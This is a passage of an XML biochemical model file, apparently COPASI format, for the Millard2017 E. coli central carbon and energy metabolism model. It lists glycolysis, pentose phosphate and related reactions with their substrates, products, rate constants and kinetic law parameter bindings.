<SourceParameter reference="Metabolite_12"/>
<SourceParameter reference="Metabolite_18"/>
<SourceParameter reference="Metabolite_56"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4993"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_4"/>
<SourceParameter reference="Metabolite_19"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_5" name="PGK" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_5">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-14T17:46:47Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_50" stoichiometry="1"/>
<Substrate metabolite="Metabolite_4" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_52" stoichiometry="1"/>
<Product metabolite="Metabolite_25" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4992" name="k1" value="0.1"/>
<Constant key="Parameter_4991" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4992"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_50"/>
<SourceParameter reference="Metabolite_4"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4991"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_52"/>
<SourceParameter reference="Metabolite_25"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_6" name="GPM" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_6">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-24T12:56:58Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_25" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_24" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4990" name="k1" value="0.1"/>
<Constant key="Parameter_4989" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4990"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_25"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4989"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_24"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_7" name="ENO" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_7">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T20:00:11Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_24" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_23" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4988" name="k1" value="0.1"/>
<Constant key="Parameter_4987" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4988"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_24"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4987"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_23"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_8" name="PYK" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_8">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-08T11:11:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_50" stoichiometry="1"/>
<Substrate metabolite="Metabolite_23" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_52" stoichiometry="1"/>
<Product metabolite="Metabolite_27" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4986" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4986"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_50"/>
<SourceParameter reference="Metabolite_23"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_9" name="ZWF" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_9">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-30T23:06:06Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_11" stoichiometry="1"/>
<Substrate metabolite="Metabolite_20" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_13" stoichiometry="1"/>
<Product metabolite="Metabolite_21" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4985" name="k1" value="0.1"/>
<Constant key="Parameter_4984" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4985"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_11"/>
<SourceParameter reference="Metabolite_20"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4984"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_13"/>
<SourceParameter reference="Metabolite_21"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_10" name="PGL" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_10">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-05T14:31:20Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_13" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_26" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4983" name="k1" value="0.1"/>
<Constant key="Parameter_4982" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4983"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_13"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4982"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_26"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_11" name="GND" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_11">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:44:26Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_20" stoichiometry="1"/>
<Substrate metabolite="Metabolite_26" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_21" stoichiometry="1"/>
<Product metabolite="Metabolite_31" stoichiometry="1"/>
<Product metabolite="Metabolite_55" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4981" name="k1" value="0.1"/>
<Constant key="Parameter_4980" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4981"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_20"/>
<SourceParameter reference="Metabolite_26"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4980"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_21"/>
<SourceParameter reference="Metabolite_31"/>
<SourceParameter reference="Metabolite_55"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_12" name="RPE" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_12">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-21T14:42:32Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_31" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_35" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4979" name="k1" value="0.1"/>
<Constant key="Parameter_4978" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4979"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_31"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4978"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_35"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_13" name="RPI" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_13">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-22T20:48:16Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_31" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_30" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4977" name="k1" value="0.1"/>
<Constant key="Parameter_4976" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4977"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_31"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4976"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_30"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_14" name="X5P_GAP_TKT" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_14">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-15T11:51:30Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_48" stoichiometry="1"/>
<Substrate metabolite="Metabolite_35" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_12" stoichiometry="1"/>
<Product metabolite="Metabolite_49" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4975" name="k1" value="0.1"/>
<Constant key="Parameter_4974" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4975"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_48"/>
<SourceParameter reference="Metabolite_35"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4974"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_12"/>
<SourceParameter reference="Metabolite_49"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_15" name="F6P_E4P_TKT" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_15">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-25T20:00:11Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_7" stoichiometry="1"/>
<Substrate metabolite="Metabolite_49" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_8" stoichiometry="1"/>
<Product metabolite="Metabolite_48" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4973" name="k1" value="0.1"/>
<Constant key="Parameter_4972" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4973"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_7"/>
<SourceParameter reference="Metabolite_49"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4972"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_8"/>
<SourceParameter reference="Metabolite_48"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_16" name="S7P_R5P_TKT" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_16">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-09T18:41:37Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_30" stoichiometry="1"/>
<Substrate metabolite="Metabolite_49" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_32" stoichiometry="1"/>
<Product metabolite="Metabolite_48" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4971" name="k1" value="0.1"/>
<Constant key="Parameter_4970" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4971"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_30"/>
<SourceParameter reference="Metabolite_49"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4970"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_32"/>
<SourceParameter reference="Metabolite_48"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_17" name="F6P_GAP_TAL" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_17">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-09-27T11:53:43Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_12" stoichiometry="1"/>
<Substrate metabolite="Metabolite_47" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_8" stoichiometry="1"/>
<Product metabolite="Metabolite_46" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4969" name="k1" value="0.1"/>
<Constant key="Parameter_4968" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4969"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_12"/>
<SourceParameter reference="Metabolite_47"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4968"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_8"/>
<SourceParameter reference="Metabolite_46"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_18" name="S7P_E4P_TAL" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_18">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-09T18:41:34Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_32" stoichiometry="1"/>
<Substrate metabolite="Metabolite_46" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_7" stoichiometry="1"/>
<Product metabolite="Metabolite_47" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4967" name="k1" value="0.1"/>
<Constant key="Parameter_4966" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4967"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_32"/>
<SourceParameter reference="Metabolite_46"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4966"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_7"/>
<SourceParameter reference="Metabolite_47"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_19" name="FBP" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_19">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T17:07:07Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_9" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_8" stoichiometry="1"/>
<Product metabolite="Metabolite_56" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4965" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4965"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_9"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_20" name="PPC" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_20">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:45:27Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_23" stoichiometry="1"/>
<Substrate metabolite="Metabolite_55" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_22" stoichiometry="1"/>
<Product metabolite="Metabolite_56" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4964" name="k1" value="0.1"/>
<Constant key="Parameter_4963" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4964"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_23"/>
<SourceParameter reference="Metabolite_55"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4963"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_22"/>
<SourceParameter reference="Metabolite_56"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_21" name="PCK" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_21">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:46:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_52" stoichiometry="1"/>
<Substrate metabolite="Metabolite_22" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_50" stoichiometry="1"/>
<Product metabolite="Metabolite_23" stoichiometry="1"/>
<Product metabolite="Metabolite_55" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4962" name="k1" value="0.1"/>
<Constant key="Parameter_4961" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4962"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_52"/>
<SourceParameter reference="Metabolite_22"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4961"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_50"/>
<SourceParameter reference="Metabolite_23"/>
<SourceParameter reference="Metabolite_55"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_22" name="PPS" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_22">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-01T13:57:27Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_52" stoichiometry="1"/>
<Substrate metabolite="Metabolite_27" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_51" stoichiometry="1"/>
<Product metabolite="Metabolite_23" stoichiometry="1"/>
<Product metabolite="Metabolite_56" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4960" name="k1" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4960"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_52"/>
<SourceParameter reference="Metabolite_27"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_23" name="MAE" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_23">
<dcterms:created>
